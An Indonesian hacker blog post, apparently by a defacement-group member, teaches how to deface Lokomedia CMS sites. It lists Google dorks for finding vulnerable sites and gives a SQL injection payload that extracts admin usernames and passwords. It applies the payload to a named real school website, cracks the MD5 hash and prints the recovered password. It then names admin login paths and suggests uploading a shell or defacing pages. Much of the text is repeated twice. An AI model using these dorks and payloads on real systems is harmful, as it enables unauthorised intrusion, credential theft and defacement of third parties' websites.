Assalamualaikum W.r W.b
Bertemu lagi dengan saya MR.W4HYU yang paling gans di indonesian error system , yang lain mah burik , jelek
Oke
Kali ini saya aka memberikan tutotial deface dengan cara SQL injection on Lokomedia CMS
Jadi gini sebelum saya lanjut ke pembahasan
Saya mau bilang saya itu habis putus gan
Dan jadi bully an di team , makanya saya biki tutorial ini buat mengisi waktu gabut saya.
Oke langsung aja . Curhat terus kapan mulai nya?
Bertemu lagi dengan saya MR.W4HYU yang paling gans di indonesian error system , yang lain mah burik , jelek
Oke
Kali ini saya aka memberikan tutotial deface dengan cara SQL injection on Lokomedia CMS
Jadi gini sebelum saya lanjut ke pembahasan
Saya mau bilang saya itu habis putus gan
Dan jadi bully an di team , makanya saya biki tutorial ini buat mengisi waktu gabut saya.
Oke langsung aja . Curhat terus kapan mulai nya?
BAHAN
1.Dork:inurl:/statis-1-profil.html
inurl:/statis-2-profil.html
inurl:/statis-3-profil.html
inurl:hal-tentang-kami.html
inurl:/kategoriberita-- ext:html
inurl:hal-visi-misi.html
inurl:hal-program--kegiatan.html
inurl:hal-struktur-organisasi.html
inurl:hal-kata-sambutan.html
intext:copyright by inurl:statis-1 ext:html
inurl:statis-1-tujuan.html
inurl:/statis-10 ext:html
inurl:/statis-16 ext:html
inurl:/kategoriartikel-1-Berita ext:html
inurl:/statis-5 ext:htm
intitle:"sejarah" inurl:/sejarah ext:html
intext:"bojonegoro" inurl:/sejarah ext:html
intext:"kalimantan" inurl:/sejarah ext:html
intext:"jakarta" inurl:/sejarah ext:html
intext:"tuban" inurl:/sejarah ext:html
intext:"lamongan" inurl:/sejarah ext:html
intext:"indonesia" inurl:/sejarah ext:html
intext:"danau" inurl:/sejarah ext:html
intext:"pantai" inurl:/sejarah ext:html
intext:"wisata" inurl:/sejarah ext:html
*nomer nya bisa di ubah agar bisa dapet yg fresh hehe
1.Dork:inurl:/statis-1-profil.html
inurl:/statis-2-profil.html
inurl:/statis-3-profil.html
inurl:hal-tentang-kami.html
inurl:/kategoriberita-- ext:html
inurl:hal-visi-misi.html
inurl:hal-program--kegiatan.html
inurl:hal-struktur-organisasi.html
inurl:hal-kata-sambutan.html
intext:copyright by inurl:statis-1 ext:html
inurl:statis-1-tujuan.html
inurl:/statis-10 ext:html
inurl:/statis-16 ext:html
inurl:/kategoriartikel-1-Berita ext:html
inurl:/statis-5 ext:htm
intitle:"sejarah" inurl:/sejarah ext:html
intext:"bojonegoro" inurl:/sejarah ext:html
intext:"kalimantan" inurl:/sejarah ext:html
intext:"jakarta" inurl:/sejarah ext:html
intext:"tuban" inurl:/sejarah ext:html
intext:"lamongan" inurl:/sejarah ext:html
intext:"indonesia" inurl:/sejarah ext:html
intext:"danau" inurl:/sejarah ext:html
intext:"pantai" inurl:/sejarah ext:html
intext:"wisata" inurl:/sejarah ext:html
*nomer nya bisa di ubah agar bisa dapet yg fresh hehe
2.Exploit:
'union+select+make_set(6,@:=0x0a,(select(1)from(users)where@:=make_set(511,@,0x3C6C693E,username,password)),@)--+
'union+select+make_set(6,@:=0x0a,(select(1)from(users)where@:=make_set(511,@,0x3C6C693E,username,password)),@)--+
Oke langsung saja kita dorking memakai dork yg di atas tadi
- disini saya sudah mempunyai live target >http://www.smaitnurhidayah.sch.id/statis-1-profil.html
- selanjutnya apa gan? Selanjutnya kita masukan exploit nya di bagian setelah angka jadi seperti ini
http://www.smaitnurhidayah.sch.id/statis-1'union+select+make_set(6,@:=0x0a,(select(1)from(users)where@:=make_set(511,@,0x3C6C693E,username,password)),@)--+-profil.html
- setelah itu kita ambil user dan password, kalian bisa menggunakan CTRL + U atau bisa di cari manual kalau mata kalian bisa baca tulisan kecil iyu, untuk mengambil user dan password nya contoh seperti ini
- disini saya sudah mempunyai live target >http://www.smaitnurhidayah.sch.id/statis-1-profil.html
- selanjutnya apa gan? Selanjutnya kita masukan exploit nya di bagian setelah angka jadi seperti ini
http://www.smaitnurhidayah.sch.id/statis-1'union+select+make_set(6,@:=0x0a,(select(1)from(users)where@:=make_set(511,@,0x3C6C693E,username,password)),@)--+-profil.html
- setelah itu kita ambil user dan password, kalian bisa menggunakan CTRL + U atau bisa di cari manual kalau mata kalian bisa baca tulisan kecil iyu, untuk mengambil user dan password nya contoh seperti ini

Seperti ini
- nah berhubung saya lagi hoki, itu sudah terlihat user dan password nya tapi password nya masih berbentuk MD5 maka kita harus mendecrypt password tersebut menggunakan Hash Killer
- kalian bisa mendecrypt password tersebut disini Hash Killer
- nah selanjutnya kita decrypt password tersebut, nah dan hasilnya seperti ini
- kalian bisa mendecrypt password tersebut disini Hash Killer
- nah selanjutnya kita decrypt password tersebut, nah dan hasilnya seperti ini

 |
| Seperti ini |
- dan ternyata password nya itu adalah : 12oktober2008
- setelah itu kalian tinggal login ke halaman admin
- untuk login cms lokomedia biasanya di
-site.com/admin
-site.com/adminweb
-site.com /redaktur
-site.com/administrator
- yaps jika sudah menemukan admin login nya kalian bisa upload shell , upload fotk mantan atau edit berita entahlah sesuka kalian
- nah mungkin cukup sekian.... next saya akan memberikan tutorial mengupload shell di cms lokomedia
tapi tidak sekarang berhubung saya habis putus jadi saya lagi males
Oke sampai jumpa di lain waktu bye bye .
- setelah itu kalian tinggal login ke halaman admin
- untuk login cms lokomedia biasanya di
-site.com/admin
-site.com/adminweb
-site.com /redaktur
-site.com/administrator
- yaps jika sudah menemukan admin login nya kalian bisa upload shell , upload fotk mantan atau edit berita entahlah sesuka kalian
- nah mungkin cukup sekian.... next saya akan memberikan tutorial mengupload shell di cms lokomedia
tapi tidak sekarang berhubung saya habis putus jadi saya lagi males
Oke sampai jumpa di lain waktu bye bye .
(Teruslah berkarya tanpa merusak)
MR.W4HYU
